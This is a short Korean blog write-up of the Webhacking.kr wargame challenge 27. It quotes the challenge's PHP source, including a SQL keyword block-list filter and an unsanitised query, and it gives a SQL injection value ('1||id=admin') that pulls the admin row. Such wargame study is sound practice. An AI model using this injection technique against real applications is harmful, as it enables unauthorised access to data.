본문 바로가기
Hacking/Webhacking.kr(스포주의)

Webhacking.kr 27

Cirrus.Kim 2016. 1. 15. 01:00
소스를 보자

if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack");

$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");

select id from challenge27_table where id='guest' and no=1||id=admin


저작자표시

'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글

Webhacking.kr 25  (0) 2016.01.15
Webhacking 42  (0) 2016.01.15
Webhacking.kr 26  (0) 2016.01.15
Webhacking.kr 54  (0) 2016.01.15
Webhacking.kr 6  (0) 2016.01.15

'Hacking/Webhacking.kr(스포주의)' Related Articles

티스토리툴바